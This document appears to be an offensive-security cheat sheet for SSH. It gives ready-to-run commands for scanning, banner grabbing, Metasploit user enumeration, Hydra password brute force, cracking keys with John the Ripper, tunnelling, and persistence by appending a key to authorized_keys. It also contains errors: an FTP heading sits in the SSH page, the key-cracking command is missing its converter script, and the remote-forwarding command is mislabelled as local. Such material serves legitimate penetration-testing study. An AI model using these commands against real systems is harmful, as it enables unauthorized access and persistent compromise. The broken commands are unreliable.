SSH (Secure Shell)
Default Port: 22
Secure Shell (SSH) is a protocol used to securely connect to another computer over a network. It allows you to log into another computer, execute commands, and transfer files, all in a secure manner. This is because SSH encrypts your connection, making it difficult for hackers to intercept and understand the data being exchanged.
It's commonly used by network administrators to control web servers, by developers to access programming environments, and by anyone needing secure access to a computer over the internet.
Connect with Terminal
If you have knowledge of a target credential, you can establish a remote server connection via SSH using that credential.
ssh username@X.X.X.X
If you have the private key, you can log in to a remote server using SSH.
ssh -i path/to/private_key user@target-ip
Connect with PuTTY (Windows)
Install PuTTY and run it then enter target IP address and port(22 by default) also choose to connect type as SSH.
Identifying an FTP Server
You can use Nmap
to check if there's an SSH server on a target host like this:
nmap -p 22 X.X.X.X
Banner Grabbing
You can use Netcat
to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.
nc -vn X.X.X.X 22
Automated audit with ssh-audit
"ssh-audit" is a tool for analyzing SSH connections, providing details on banners, OS/software recognition, compression detection, algorithm information and security recommendations.
ssh-audit X.X.X.X 22
Identify Authentication Methods with Nmap
is an Nmap script used to identify the authentication methods supported by an SSH server.
nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 X.X.X.X
User Enumeration with Metasploit
The ssh_enumusers
module in Metasploit is designed to enumerate valid usernames on a target SSH server. It performs this by attempting to log in with a list of commonly used usernames.
msf> use auxiliary/scanner/ssh/ssh_enumusers
Attack Vectors
Brute Force Attack
Attempt to guess the password of an SSH account:
hydra -l user -P /path/to/wordlist.txt ssh://X.X.X.X
SSH Key Brute Forcing
Attempting to crack SSH keys with tools like `John the Ripper``:
/usr/share/john/ id_rsa > id_rsa.hash
john --wordlist=path/to/wordlist.txt id_rsa.hash
Port Forwarding
Forward local ports to the attacker's machine to access network services on the target's network:
Local Port Forwarding
ssh -L localPort:remoteHost:remotePort user@sshServer
Local Port Forwarding
ssh -R remotePort:localHost:localPort user@sshServer
SSH Tunneling
Use SSH to securely tunnel network traffic:
ssh -D 8080 user@X.X.X.X
File Transfer
SCP (Secure Copy Protocol)
Download files
scp user@target-ip:/path/to/remote/file /path/to/local/destination
Upload files
scp /path/to/local/file user@target-ip:/path/to/remote/destination
SFTP (SSH File Transfer Protocol):
sftp user@target-ip
Command Execution
Execute commands on the remote machine:
ssh user@target-ip 'command_to_run'
Maintaining Access
Deploy SSH keys for persistent access:
echo your_public_key >> ~/.ssh/authorized_keys
Privilege Escalation
Leverage local vulnerabilities or misconfigurations to gain elevated privileges.
Check for sudo privileges:
ssh user@target-ip 'sudo -l'